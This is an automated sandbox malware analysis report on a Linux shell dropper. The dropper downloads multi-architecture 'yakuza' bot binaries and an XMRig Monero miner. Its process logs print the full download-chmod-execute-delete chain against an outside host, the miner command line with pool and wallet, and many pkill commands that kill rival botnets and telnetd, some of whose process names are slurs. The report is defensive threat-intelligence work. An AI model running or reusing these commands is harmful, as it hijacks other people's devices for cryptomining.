Malware Analysis Report

2025-01-02 07:09

Sample ID 241124-c6lz3awmfk
Target ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
SHA256 ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
Tags
defense_evasion discovery xmrig xmrig_linux miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Threat Level: Known bad

The file ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery xmrig xmrig_linux miner

xmrig

XMRig Miner payload

Xmrig_linux family

Xmrig family

Executes dropped EXE

File and Directory Permissions Modification

Enumerates running processes

Reads CPU attributes

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 02:41

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:44

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Max time network

30s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:43

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

153s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/sh N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/usr/bin/pkill

[pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/usr/bin/pkill

[pkill -9 scansh4]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/busybox

[busybox pkill -9 flexsonskids]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/usr/bin/pkill

[pkill -9 sysgpu]

/bin/busybox

[busybox pkill -9 sysgpu]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/grep

[grep xmrig]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/chmod

[chmod +x xmrig]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/busybox

[busybox pkill -9 geae]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh
